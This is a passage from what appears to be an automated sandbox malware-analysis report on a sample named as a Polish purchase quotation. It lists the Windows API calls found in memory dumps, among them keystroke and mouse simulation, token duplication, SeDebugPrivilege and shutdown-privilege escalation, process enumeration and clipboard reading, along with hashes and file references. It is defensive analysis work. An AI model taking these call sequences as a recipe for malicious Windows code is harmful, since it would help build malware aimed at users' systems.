                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00437699
                                                                                                                                                                                                                                                      • keybd_event.USER32(00000012,00000000), ref: 004376A2
                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004376AD
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376CD
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D3
                                                                                                                                                                                                                                                      • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,004448AF), ref: 004376D9
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Thread$Window$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                      • API String ID: 3778422247-2988720461
                                                                                                                                                                                                                                                      • Opcode ID: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                                                                                                                                                      • Instruction ID: 6108fbe056c1a000d5481f33e03d330ccc862392245923d3170deea12ea07584
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec12ba9e870cc2e5dd85ad52799cb15a6745d125a488419c4f0ebb71fc1ee38e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC31A4712803157FE6245BA59D0EF7F3F9CEB48B51F10082EFA02EA1D1DAE458009B79
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 0044621B
                                                                                                                                                                                                                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,?,?,?,?,?,?,?), ref: 00446277
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0044628A
                                                                                                                                                                                                                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004462A4
                                                                                                                                                                                                                                                      • GetProcessWindowStation.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462BD
                                                                                                                                                                                                                                                      • SetProcessWindowStation.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004462C8
                                                                                                                                                                                                                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004462E4
                                                                                                                                                                                                                                                      • _wcslen.LIBCMT ref: 0044639E
                                                                                                                                                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                      • _wcsncpy.LIBCMT ref: 004463C7
                                                                                                                                                                                                                                                      • LoadUserProfileW.USERENV(?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 004463E7
                                                                                                                                                                                                                                                      • CreateEnvironmentBlock.USERENV(?,?,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00446408
                                                                                                                                                                                                                                                      • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,?,?,00000000,?), ref: 00446446
                                                                                                                                                                                                                                                      • UnloadUserProfile.USERENV(?,?,?,?,?,?,?), ref: 00446483
                                                                                                                                                                                                                                                      • CloseWindowStation.USER32(00000000,?,?,?,?), ref: 00446497
                                                                                                                                                                                                                                                      • CloseDesktop.USER32(00000000,?,?,?,?), ref: 0044649E
                                                                                                                                                                                                                                                      • SetProcessWindowStation.USER32(?,?,?,?,?), ref: 004464A9
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?), ref: 004464B4
                                                                                                                                                                                                                                                      • DestroyEnvironmentBlock.USERENV(?,?,?,?,?,?), ref: 004464C8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_memset_wcslen_wcsncpy
                                                                                                                                                                                                                                                      • String ID: $default$winsta0
                                                                                                                                                                                                                                                      • API String ID: 2173856841-1027155976
                                                                                                                                                                                                                                                      • Opcode ID: 094431d5554b704bab95630eeb884343d6d39e89a6cd3f795acd0a4f96f0a885
                                                                                                                                                                                                                                                      • Instruction ID: eafd5d154f9bcf2590b8f8eb1e0f3d39b01f77f2fd200ee1cb9c7344d9c52646
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 094431d5554b704bab95630eeb884343d6d39e89a6cd3f795acd0a4f96f0a885
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DD819170208341AFE724DF65C848B6FBBE8AF89744F04491DF69097291DBB8D805CB6B
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00444233: _wcslen.LIBCMT ref: 0044424E
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0046449E
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004644B4
                                                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 004644C8
                                                                                                                                                                                                                                                      • OpenThreadToken.ADVAPI32(00000000), ref: 004644CF
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004644E0
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004644E7
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                                                                                                                                                                                                      • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                      • API String ID: 1312810259-2896544425
                                                                                                                                                                                                                                                      • Opcode ID: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                                                                                                                                                      • Instruction ID: c3f5e6af55eb0da9fa74db60d4f5a84adac3a89a74612fbe59a223ef38337450
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb2abcbadcb50e0008f3b1fe3e217bfa736f6ade076d8095da49bf04f95d98f8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0E51A171200201AFD710DF65DD85F5BB7A8AB84704F10892EFB44DB2C1D7B8E844CBAA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Timetime$Sleep
                                                                                                                                                                                                                                                      • String ID: BUTTON
                                                                                                                                                                                                                                                      • API String ID: 4176159691-3405671355
                                                                                                                                                                                                                                                      • Opcode ID: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                                                                                                                                                      • Instruction ID: 32c89cc89acb3c111fc3cc5f781edb0c57d51ec263d79eeef99f8852f1a29925
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9fcf2e0d9fa6a0073e84c27d550d5c6e5d49d4b0adb2218bf3fff485548fdb5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB21B7723843016BE330DB74FD4DF5A7B94A7A5B51F244876F600E6290D7A5D442876C
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00436504
                                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                                                                                                                                                                                      • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                                                                                                                                                                                      • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                                                                                                                                      • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                      • API String ID: 2938487562-3733053543
                                                                                                                                                                                                                                                      • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                                                                                                                                                      • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00436162
                                                                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 00436176
                                                                                                                                                                                                                                                        • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                                                                                                                                                                                                      • __wcsicoll.LIBCMT ref: 00436185
                                                                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                                                                                                                                                                                      • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                                                                                                                                                                                      • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                                                                                                                                                                                      • LockResource.KERNEL32(?), ref: 004361FD
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2406429042-0
                                                                                                                                                                                                                                                      • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                                                                                                                                                      • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0045D59D
                                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                                                      • API String ID: 4194297153-14809454
                                                                                                                                                                                                                                                      • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                                                                                                                                                      • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                                                                                                                                                                                      • __wsplitpath.LIBCMT ref: 004370A5
                                                                                                                                                                                                                                                        • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                      • _wcscat.LIBCMT ref: 004370BA
                                                                                                                                                                                                                                                      • __wcsicoll.LIBCMT ref: 004370C8
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2547909840-0
                                                                                                                                                                                                                                                      • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                                                                                                                                                      • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                                                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                                                                                                                                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                                                                                                                                                                                      • String ID: *.*
                                                                                                                                                                                                                                                      • API String ID: 2693929171-438819550
                                                                                                                                                                                                                                                      • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                                                                                                                                                      • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                                                                                                                                                      • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0046C692
                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0046C866
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                                                                                                                                                      • String ID: HH
                                                                                                                                                                                                                                                      • API String ID: 589737431-2761332787
                                                                                                                                                                                                                                                      • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                                                                                                                                                      • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __wcsicoll.LIBCMT ref: 0043643C
                                                                                                                                                                                                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                                                                                                                                                                                                      • __wcsicoll.LIBCMT ref: 00436466
                                                                                                                                                                                                                                                      • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2055576664.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055542354.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055838002.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2055879208.00000000004A7000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2056049270.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_zapytanie ofertowe st-2024-s315 cpa9170385.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __wcsicollmouse_event
                                                                                                                                                                                                                                                      • String ID: DOWN
                                                                                                                                                                                                                                                      • API String ID: 1033544147-711622031
                                                                                                                                                                                                                                                      • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                                                                                                                                                      • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
